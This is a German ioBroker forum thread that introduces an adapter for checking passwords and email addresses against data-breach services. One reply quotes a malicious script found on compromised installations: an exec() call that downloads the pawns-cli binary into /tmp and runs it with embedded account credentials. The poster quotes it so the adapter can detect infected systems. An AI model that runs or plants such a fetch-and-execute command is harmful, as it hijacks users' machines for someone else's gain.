Monatsrückblick Januar/Februar 2026 ist online!

David G.

ioBroker.pwned-check – Passwörter & E-Mails auf Datenlecks prüfen

Hallo zusammen,

ich möchte euch meinen neuen Adapter ioBroker.pwned-check vorstellen. Er prüft regelmäßig, ob eure Passwörter oder E-Mail-Adressen in bekannten Datenlecks aufgetaucht sind – Passwörter über Have I Been Pwned, E-Mails über XposedOrNot.

---

Was macht der Adapter?

ioBroker.pwned-check prüft in konfigurierbaren Intervallen:

• Passwörter über die Have I Been Pwned-API – der SHA-1-Hash wird im Browser berechnet, nur die ersten 5 Zeichen werden übertragen (k-Anonymity). Weder das Klartext-Passwort noch der vollständige Hash verlassen euren Server – ioBroker speichert ausschließlich den Hash
• E-Mail-Adressen über die XposedOrNot-API – die Adresse wird direkt abgefragt und mit bekannten Datenleck-Datenbanken abgeglichen

Wird ein Treffer gefunden, wird eine Benachrichtigung ausgelöst. Der Adapter unterstützt das ioBroker Notification-System, sodass sich der Benachrichtigungskanal (z. B. Telegram) bequem über den Notification Manager konfigurieren lässt.

---

Datenpunkte

Für jedes Passwort und jede E-Mail werden Datenpunkte angelegt:

• isPwned – wurde ein Leak gefunden?
• leakCount – Anzahl der bekannten Vorkommen
• lastCheck – Zeitpunkt der letzten Prüfung
• info.anyPwned – globaler Status, ob irgendetwas kompromittiert ist

---

Konfiguration

1. Adapter installieren und Instanz öffnen
2. Passwörter und/oder E-Mail-Adressen eintragen
3. Prüfintervall festlegen (Standard: 24 Stunden)

---

GitHub

• Quellcode & Issues: https://github.com/ipod86/ioBroker.pwned-check
• npm: https://www.npmjs.com/package/iobroker.pwned-check

Feedback, Bugreports und Feature-Wünsche sind herzlich willkommen!

Thomas Braun

@David-G.

Du könntest auch prüfen ob der Prozess
pawns-cli
auf dem System läuft.
Dann wurde die Kiste nämlich mit Malware infiziert. Auf solchen Systemen läuft dieses unter 'Globale Skripte' abgelegte Ding:

exec('cd /tmp/ ; wget https://pawns-app.s3.eu-central-1.amazonxxx.com/cli/latest/linux_x86_64/pawns-cli; chmod -x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=NEW79164@io --accept-tos', function (error, stdout, stderr) {
    console.log('stdout: ' + stdout);
});

David G.

@thomas-braun
Mein System ist sauber und der Adapter installiert die pawns-cli nicht.

Läuft alles über API.

Thomas Braun

@David-G.

Nein, der Adapter könnte aber prüfen, ob das Zeug läuft.

David G.

Warum genau da drauf prüfen? Gibt ja maleware ohne Ende.

EDIT
Deshalb?
https://forum.iobroker.net/topic/66381/gelöst-seltsames-script-unter-global

Ist das noch aktuell?

Thomas Braun

@David-G. sagte:

Ist das noch aktuell?

Ja, das ist immer noch aktuell.

Homoran

@David-G. sagte:

Deshalb?

Ja!
Das ist kein Einzelfall gewesen!

David G.

Okay, dann schaue ich da morgen mal nach.
Wer testet es dann freiwillig 🤣?

Thomas Braun

@David-G. sagte:

Wer testet es dann freiwillig 🤣?

Unfreiwillig testen es die ganzen Leute, die den Admin ungesichert im Netz stehen haben.

David G.

@Thomas-Braun

Ob sich diese User so Adapter installieren ^^.

Thomas Braun

@Feuersturm

Im Kleinen hab ich solch einen (zumindest rudimentären) Check in iob diag drin. Wobei ich nicht weiß, ob der Check aus externe Module erfasst oder sich auf die 'ab Werk' mitgelieferten beschränkt.

Feuersturm

@Thomas-Braun Hier geht die Diskussion weiter https://forum.iobroker.net/topic/84252/iobroker.securitycheck-brainstorming

David G.

@Thomas-Braun sagte:

Nein, der Adapter könnte aber prüfen, ob das Zeug läuft.

Ist eingebaut.
Passt zwar eigentlich nicht zum Adapter, aber durch den Namen "pawns-cli" irgendwie doch ^^.

Wenn was Feedback gekommen ist, ob es überall läuft, schaue ich mal ins latest zu kommen.